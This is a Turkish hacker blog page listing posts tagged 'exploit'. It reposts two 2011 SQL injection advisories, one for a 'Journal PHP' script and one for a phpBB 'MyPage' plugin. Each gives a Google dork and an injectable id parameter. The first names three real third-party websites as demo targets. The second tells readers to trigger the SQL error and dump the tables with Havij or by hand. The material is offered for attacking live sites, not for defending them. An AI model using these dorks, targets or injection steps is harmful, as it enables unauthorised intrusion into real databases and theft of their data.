exploit etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
exploit etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

16 Aralık 2011 Cuma

Journal PHP SQL Injection


Th4 MasK

Olmassa Olmazlarımdır Bazı Şeyler.


########################################################

~ Exploit Title: * Journal PHP SQL Injection *~

~ Author: Th4 MasK

~ Contact to ; th4_mask@windowslive.com ~

~ Date : 13.12.2011 ~

~ Platform : Php ~


########################################################

~ Google Dork: journal.php?id=


########################################################

~ Demos Site :

~ http://www.lcoastpress.com/journal.php?id=3 (SQL)

~ http://www.trinityfoundation.org/journal.php?id=103 (SQL)

~ https://lcoast.sslcert19.com/journal.php?id=5 (SQL)

########################################################

~*Bilinmezlik Diyari

########################################################

~*Olmassa Olmazdir Bazi seyler.

########################################################

~*Email:th4_mask@windowslive.com~

~ Greetz:http://www.turkhackteam.net  ~ http://th4mask.blogspot.com/
 

########################################################
 
~ ZoRRoKiN & Margu & Gezginler

~ TurkHackTeam.Net  ~  http://th4mask.blogspot.com/

########################################################     



Journal PHP SQL Injection ≈ Packet Storm

12 Aralık 2011 Pazartesi

MyPage plugin (phpBB) SQL Injection

The Levis Kardeşimin Buldugu Bug.


MyPage plugin (phpBB) SQL Injection(Tüm Versiyonlar)
====================================================

====================================================
VISIT http://www.turkhackteam.net
====================================================

# Exploit Title: SQL Injection PhpBB Plugin Mypage
# Google Dork: inurl:”mypage.php?id=”
# Date: 09/12/2011
# Author: TheLevis
# Version: Tüm Versyionlarda Geçerlidir.
# Tested on: localhost

====================================================
VISIT http://thelevis.wordpress.com
====================================================

[~] Exploit:
http://localhost/forum/
[~] http://localhost/forum/mypage.php?id=’a(SQL)
[~] sql hata almayı biliyorsunuzdur herhalde.
[~] Havij ile veya Manuel Olarak Tabloları Çekebilirsiniz.